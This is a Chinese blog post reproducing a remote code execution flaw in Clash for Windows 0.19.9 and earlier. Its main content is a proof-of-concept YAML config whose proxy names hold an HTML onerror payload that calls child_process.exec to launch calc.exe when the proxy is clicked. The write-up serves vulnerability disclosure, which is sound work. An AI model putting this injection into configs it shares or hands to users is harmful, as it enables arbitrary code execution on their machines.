Clash RCE 漏洞復現
阿新 • • 發佈:2022-03-01
一、介紹
clash for windows是一款非常好用的程式設計輔助代理工具,相容性非常強,可以支援多平臺、snell,vmess等等,滿足不同使用者之間的使用需求,大大提高使用者的工作效率。軟體還可以自定義介面顏色,主題設定,方便使用者使用。
二、影響範圍
- Windows v0.19.9版本及以下
- MAC OS版本未知
三、復現流程
poc:
port: 7890 socks-port: 7891 allow-lan: true mode: Rule log-level: info external-controller: :9090 proxies: - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: socks5 server: 127.0.0.1 port: "17938" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: "8088" skip-cert-verify: true proxy-groups: - name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: select proxies: - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
1、將poc放入檔案中修改為yaml格式,然後匯入
2、此時點選代理即可觸發計算器的命令
轉載請註明:Adminxe's Blog»Clash RCE 漏洞復現